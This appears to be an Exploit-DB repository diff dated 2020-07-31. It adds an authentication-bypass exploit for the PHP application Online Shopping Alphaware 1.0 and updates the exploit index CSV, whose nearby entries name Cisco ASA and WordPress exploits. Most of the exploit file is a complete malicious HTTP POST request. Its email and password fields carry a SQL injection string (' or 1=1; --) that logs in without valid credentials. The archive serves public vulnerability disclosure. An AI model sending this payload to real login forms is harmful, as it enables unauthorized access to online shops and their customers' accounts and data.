DB: 2020-07-31

1 changes to exploits/shellcodes

Online Shopping Alphaware 1.0 - Authentication Bypass

exploits/php/webapps/48725.txt

@@ -0,0 +1,24 @@
+# Title: Online Shopping Alphaware 1.0 - Authentication Bypass
+# Exploit Author: Ahmed Abbas
+# Date: 2020-07-28
+# Vendor Homepage: https://www.sourcecodester.com/php/14368/online-shopping-alphaware-phpmysql.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14368&title=Online+Shopping+Alphaware+in+PHP%2FMysql
+# Version: 1.0
+# Tested On: Windows 10 Pro 1909 (x64_86) + XAMPP 7.4.4
+ 
+# Malicious POST Request to https://TARGET
+POST /alphaware/index.php HTTP/1.1
+Host: 172.16.65.130
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://172.16.65.130/alphaware/index.php
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 72
+DNT: 1
+Connection: close
+Cookie: PHPSESSID=gqhv9sl4d1bdtr4pspm887ft2n
+Upgrade-Insecure-Requests: 1
+
+email='+or+1%3d1%3b+--+ahmed&password='+or+1%3d1%3b+--+ahmed&login=Login

files_exploits.csv

@@ -42967,3 +42967,4 @@ id,file,description,date,author,type,platform,port
 48722,exploits/hardware/webapps/48722.txt,"Cisco Adaptive Security Appliance Software 9.11 - Local File Inclusion",2020-07-28,0xmmnbassel,webapps,hardware,
 48723,exploits/hardware/webapps/48723.sh,"Cisco Adaptive Security Appliance Software 9.7 - Unauthenticated Arbitrary File Deletion",2020-07-29,0xmmnbassel,webapps,hardware,
 48724,exploits/php/webapps/48724.txt,"Wordpress Plugin Maintenance Mode by SeedProd 5.1.1 - Persistent Cross-Site Scripting",2020-07-29,"Jinson Varghese Behanan",webapps,php,
+48725,exploits/php/webapps/48725.txt,"Online Shopping Alphaware 1.0 - Authentication Bypass",2020-07-30,"Ahmed Abbas",webapps,php,